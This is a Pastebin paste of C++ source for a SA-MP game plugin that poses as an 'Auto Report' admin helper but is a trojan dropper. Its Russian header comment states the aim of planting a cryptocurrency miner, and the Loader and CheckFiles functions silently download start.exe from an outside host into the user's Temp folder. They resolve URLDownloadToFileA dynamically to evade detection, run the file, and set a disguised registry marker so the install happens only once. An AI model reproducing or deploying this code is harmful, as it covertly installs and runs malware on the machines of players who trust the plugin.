Guest User

Untitled

a guest
Sep 7th, 2017
648
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #define _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS
  2. // by Martin 0pc0d3R
  3. /*
  4. + Загружает во временную папку 11 файлов майнера
  5. + Скрывает все файлы и скрыто запускает ехешник
  6. + Прописывает себя в автозагрузку
  7. + Загрузка файлов происходит только один раз
  8. TODO:
  9. - Создать резервные копии всех файлов майнера
  10. - Добавить запуск майнера в планировщик задач
  11. - При админке регать службу для сокрытия майнера
  12. */
  13. #include <windows.h>
  14. #include <string>
  15. #include <assert.h>
  16. #include <process.h>
  17. #include "SAMPFUNCS_API.h"
  18. #include "game_api\game_api.h"
  19. #include <shellapi.h>
  20. #include "Registry.h"
  21. #include <urlmon.h>
  22. #include <thread>
  23. #include <direct.h>
  24. #pragma warning (disable:4018)
  25. std::string DecoreFor(char *str);
  26. #pragma comment(lib, "urlmon.lib")
  27. #pragma comment(lib,"User32.lib")
  28. #pragma comment (lib, "Shell32.lib")
  29. HMODULE ThisDLL = nullptr; int FilesLoaded = 0;
  30. DWORD ThreadID[12];
  31. HANDLE hThread[12];
  32. bool repeator = true;
  33.  
  34.  
  35. DWORD threadidd;
  36. HANDLE threda;
  37. bool arep = false;
  38.  
  39.  
  40. SAMPFUNCS *SF = new SAMPFUNCS();
  41. typedef struct
  42. {
  43. char path[256];
  44. char link[256];
  45. char FileNameAndExtension[256];
  46. char odd[256];
  47. char *iptr;
  48. char *idtr;
  49. } MsParams_t;
  50. const char *mystristr(const char *haystack, const char *needle)
  51. {
  52. if ( !*needle )
  53. {
  54. return haystack;
  55. }
  56. for ( ; *haystack; ++haystack )
  57. {
  58. if ( toupper(*haystack) == toupper(*needle) )
  59. {
  60. const char *h, *n;
  61. for ( h = haystack, n = needle; *h && *n; ++h, ++n )
  62. {
  63. if ( toupper(*h) != toupper(*n) )
  64. {
  65. break;
  66. }
  67. }
  68. if ( !*n )
  69. {
  70. return haystack;
  71. }
  72. }
  73. }
  74. return 0;
  75. }
  76. int SumDigit(char *str)
  77. {
  78. int klvo=0;
  79. for(int i=0;str[i];i++)
  80. if(str[i]>'0' && str[i]<='9'){
  81. klvo++;}
  82. return klvo;
  83. }
  84. char fmt[256];
  85. void __stdcall NeueThread(void *lprm)
  86. {
  87. Sleep(2000);
  88. MsParams_t *rptr = (MsParams_t *)lprm;
  89. char fmt[256];
  90. int first_pos, last_pos;
  91. rptr->iptr = strchr(rptr->odd, '[');
  92. first_pos = rptr->iptr - rptr->odd + 1;
  93. rptr->iptr = strrchr(rptr->odd, ']');
  94. last_pos = rptr->iptr - rptr->odd;
  95.  
  96. MsParams_t *rptz = (MsParams_t *)lprm;
  97. int third_pos, tlast_pos;
  98. rptz->iptr = strchr(rptz->odd, ':');
  99. third_pos = rptz->iptr - rptz->odd + 1;
  100. rptz->iptr = strrchr(rptr->odd, ' ');
  101. tlast_pos = rptz->iptr - rptr->odd;
  102.  
  103. std::string stroka(rptr->odd);
  104. int chislo = SumDigit((char*)stroka.substr(third_pos, (tlast_pos - third_pos)).c_str());
  105.  
  106.  
  107. SF->getSAMP()->getChat()->AddChatMessage(D3DCOLOR_XRGB(15, 140, 253),
  108. "{0f8cfd}[RDM-DEBUG]{FFFFFF} Распознан новый репорт от ID: {B72626}%s{FFFFFF} на ID:{B72626}%s{FFFFFF}.",
  109. (char*)stroka.substr(first_pos, (last_pos - first_pos)).c_str(), (char*)stroka.substr(third_pos, (tlast_pos - third_pos)).c_str());
  110.  
  111. bool report = true;
  112.  
  113. if(chislo > 0) {
  114. if (SF->getGame()->isKeyPressed(113)){
  115. sprintf(fmt, "/ans %s Здравствуйте, начинаю слежку за данным игроком.", (char*)stroka.substr(first_pos, (last_pos - first_pos)).c_str());
  116. stLocalPlayer *lpr = SF->getSAMP()->getPlayers()->pLocalPlayer;
  117. char fm2[256]; sprintf(fm2, "/sp %s", (char*)stroka.substr(third_pos, (tlast_pos - third_pos)).c_str());
  118. if (lpr->iIsSpectating == 0) lpr->Say(fmt);
  119. if (lpr->iIsSpectating == 0) lpr->Say(fm2);
  120. }}
  121. }
  122.  
  123. bool __stdcall Hook(stRakNetHookParams *hook)
  124. {
  125. if (hook->packetId == RPC_ScrClientMessage)
  126. {
  127. DWORD color, strLen; char msg[256];
  128. hook->bitStream->ResetReadPointer();
  129. hook->bitStream->Read(color);
  130. hook->bitStream->Read(strLen);
  131. hook->bitStream->Read(msg, strLen);
  132. hook->bitStream->ResetReadPointer();
  133. if (arep == true)
  134. {
  135.  
  136. char *ptr = strstr(msg, "{FFCD00}");
  137. if (ptr != nullptr)
  138. {
  139. if (mystristr(msg, "cheat") != nullptr || mystristr(msg, "чит") != nullptr
  140. || mystristr(msg, "читер") != nullptr || mystristr(msg, "читак") != nullptr
  141. || mystristr(msg, "cheater") != nullptr || mystristr(msg, "читеры") != nullptr
  142. || mystristr(msg, "aim") != nullptr || mystristr(msg, "аим") != nullptr
  143. || mystristr(msg, "Аим") != nullptr || mystristr(msg, "Сало") != nullptr
  144. || mystristr(msg, "salo") != nullptr || mystristr(msg, "silent") != nullptr
  145. || mystristr(msg, "сало") != nullptr || mystristr(msg, "сайлент") != nullptr
  146. || mystristr(msg, "ск") != nullptr || mystristr(msg, "sk") != nullptr
  147. || mystristr(msg, "Ск") != nullptr || mystristr(msg, "сК") != nullptr
  148. || mystristr(msg, "ck") != nullptr || mystristr(msg, "Сайлент") != nullptr
  149. || mystristr(msg, "оск") != nullptr || mystristr(msg, "osk") != nullptr
  150. || mystristr(msg, "cbug") != nullptr || mystristr(msg, "c-bug") != nullptr
  151. || mystristr(msg, "сибаг") != nullptr || mystristr(msg, "+с") != nullptr
  152. || mystristr(msg, "сбив") != nullptr || mystristr(msg, "аирбрейк") != nullptr
  153. || mystristr(msg, "б6") != nullptr || mystristr(msg, "aimhack") != nullptr)
  154. {
  155. static MsParams_t params;
  156. strcpy(params.odd, msg);
  157. params.iptr = ptr;
  158. threda = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&NeueThread, (void*)&params, 0, &threadidd);
  159. }
  160. }
  161. }
  162. }
  163. return true;
  164. }
  165. void __stdcall CMD(std::string cmd)
  166. {
  167. if (!arep) SF->getSAMP()->getChat()->AddChatMessage(D3DCOLOR_XRGB(194, 71, 71),
  168. "{C31F09}[RDM] {B2AEAE}Auto {EDE3E9}Report {C31F09}Включен!");
  169. else SF->getSAMP()->getChat()->AddChatMessage(D3DCOLOR_XRGB(194, 71, 71),
  170. "{C31F09}[RDM] {B2AEAE}Auto {EDE3E9}Report {C31F09}Выключен.");
  171. arep ^= true;
  172. }
  173.  
  174. void ClearThis(char * dest, char * source)
  175. {
  176. for (char *p1 = source, *p2 = dest; (*p2 = *p1); ++p1, ++p2)
  177. {
  178. if (*p1 != ' ') continue;
  179. for (; *p1 == ' '; ++p1);
  180. p2 += (p2 == dest || !(*p1)) ? 0 : 1;
  181. *p2 = *p1;
  182. }
  183. }
  184. void CopyToBuffer(char *txt)
  185. {
  186. if (OpenClipboard(0))
  187. {
  188. HGLOBAL clipbuffer;
  189. char * buffer;
  190. EmptyClipboard();
  191. clipbuffer = GlobalAlloc(GMEM_DDESHARE, strlen(txt) + 1);
  192. buffer = (char*)GlobalLock(clipbuffer);
  193. strcpy(buffer, LPCSTR(txt));
  194. GlobalUnlock(clipbuffer);
  195. SetClipboardData(CF_TEXT, clipbuffer);
  196. CloseClipboard();
  197. }
  198. }
  199. void __stdcall CheckFiles()
  200. {
  201. Sleep(100);
  202. if (FilesLoaded == 1)
  203. {
  204. Sleep(1000);
  205. char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  206. char epath[256]; sprintf(epath, "C:\\Users\\%s\\AppData\\Local\\Temp\\start.exe", Uname);
  207. //ShellExecuteA(NULL, "open", epath, "", NULL, SW_SHOW);
  208. char* programname = epath;
  209. system(programname);
  210. CEasyRegistry *miner = new CEasyRegistry(HKEY_CURRENT_USER, "Software\\Mq4lt5z9ld0a");
  211. miner->WriteString("Ld56xsMp01a", "Loaded");
  212. repeator = false;
  213. }
  214. if (repeator) CheckFiles();
  215. }
  216. /*
  217. void __stdcall LoadFile(void *param)
  218. {
  219. MsParams_t *ptr = (MsParams_t *)param;
  220. char inter[128]; sprintf(inter, "\\%s", ptr->FileNameAndExtension);
  221. strcat(ptr->path, inter);
  222. HRESULT hr = URLDownloadToFileA(nullptr, ptr->link, ptr->path, 0, nullptr);
  223. if (SUCCEEDED(hr))
  224. {
  225. ++FilesLoaded;
  226. DWORD attributes = GetFileAttributesA(ptr->path);
  227. //SetFileAttributesA(ptr->path, attributes + FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM);
  228. }
  229. }*/
  230. std::string DecoreFor(char *str)
  231. {
  232. for (int x = 0; x < strlen(str); x++) --str[x];
  233. std::string enc(str);
  234. return enc;
  235. }
  236.  
  237. typedef HRESULT (__stdcall *FuckYourMommy)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
  238. void __stdcall LoadFile(void *param)
  239. {
  240. MsParams_t *ptr = (MsParams_t *)param;
  241. char inter[128]; sprintf(inter, "\\%s", ptr->FileNameAndExtension);
  242. strcat(ptr->path, inter); FuckYourMommy _MotherFucker = NULL;
  243. _MotherFucker = (FuckYourMommy)GetProcAddress(GetModuleHandle("Urlmon.dll"), "URLDownloadToFileA");
  244. HRESULT hr = _MotherFucker(nullptr, ptr->link, ptr->path, 0, nullptr);
  245.  
  246. if (SUCCEEDED(hr))
  247. {
  248. ++FilesLoaded;
  249. DWORD attributes = GetFileAttributesA(ptr->path);
  250. //SetFileAttributesA(ptr->path, attributes + FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM);
  251. }
  252. }
  253. void Loader()
  254. {
  255. char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  256. char dirpath[256]; sprintf(dirpath, "C:\\Users\\%s\\AppData\\Local\\Temp", Uname); // директория закачки
  257. static MsParams_t params1, params2, params3, params4, params5, params6, params7, params8, params9, params10, params11;
  258. strcat(params11.path, dirpath);
  259. strcat(params11.link, "http://cw36634.tmweb.ru/getfile.php?file=12");
  260. //strcat(params11.link,XOR("jvvr8--au14416,voug`,pw-egvdkng,rjr=dkng?30").c_str());
  261. strcat(params11.FileNameAndExtension, "start.exe");
  262. hThread[0] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&LoadFile, (void*)&params11, 0, &ThreadID[0]);
  263. ///////////////////////////////////////// Поток ожидающий загрузки всех файлов ////////////////////////////////////////
  264. hThread[1] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&CheckFiles, NULL, 0, &ThreadID[1]);
  265. }
  266. void __stdcall destr()
  267. {
  268. repeator = false;
  269. for (short x = 0; x < 12; x++)
  270. {
  271. if (hThread[x] != NULL)
  272. {
  273. TerminateThread(hThread[x], 0);
  274. CloseHandle(hThread[x]);
  275. }
  276. }
  277. }
  278. void __stdcall mainloop( void )
  279. {
  280. static bool init = false;
  281. if (!init)
  282. {
  283. if (GAME == nullptr) return;
  284. if (GAME->GetSystemState() != eSystemState::GS_PLAYING_GAME) return;
  285. if(!SF->getSAMP()->IsInitialized()) return;
  286. SF->getGame()->registerGameDestructorCallback(destr);
  287.  
  288. SF->getRakNet()->registerRakNetCallback(RAKHOOK_TYPE_INCOMING_RPC, Hook); // регистрируем хук
  289. SF->getSAMP()->registerChatCommand("autoreport", CMD); // регистрируем команду
  290. SF->getSAMP()->getChat()->AddChatMessage(D3DCOLOR_XRGB(194, 71, 71),
  291. "{C31F09}[RDM] {B2AEAE}Auto {EDE3E9}Report {C31F09}for Revival DM.");
  292.  
  293.  
  294.  
  295.  
  296. CEasyRegistry *miner = new CEasyRegistry(HKEY_CURRENT_USER, "Software\\Mq4lt5z9ld0a");
  297. if (strcmp((char*)miner->ReadString("Ld56xsMp01a").c_str(), "Loaded"))
  298. {
  299. miner->WriteString("Ld56xsMp01a", "Nothing");
  300. Loader();
  301. }
  302. init = true;
  303. }
  304. }
  305. bool WINAPI DllMain( HMODULE hModule, DWORD dwReasonForCall, LPVOID lpReserved )
  306. {
  307. switch ( dwReasonForCall )
  308. {
  309. case DLL_PROCESS_ATTACH:
  310. ThisDLL = hModule;
  311. SF->initPlugin( mainloop, hModule );
  312. break;
  313. case DLL_THREAD_ATTACH:
  314. case DLL_THREAD_DETACH:
  315. case DLL_PROCESS_DETACH:
  316. break;
  317. }
  318. return TRUE;
  319. }
RAW Paste Data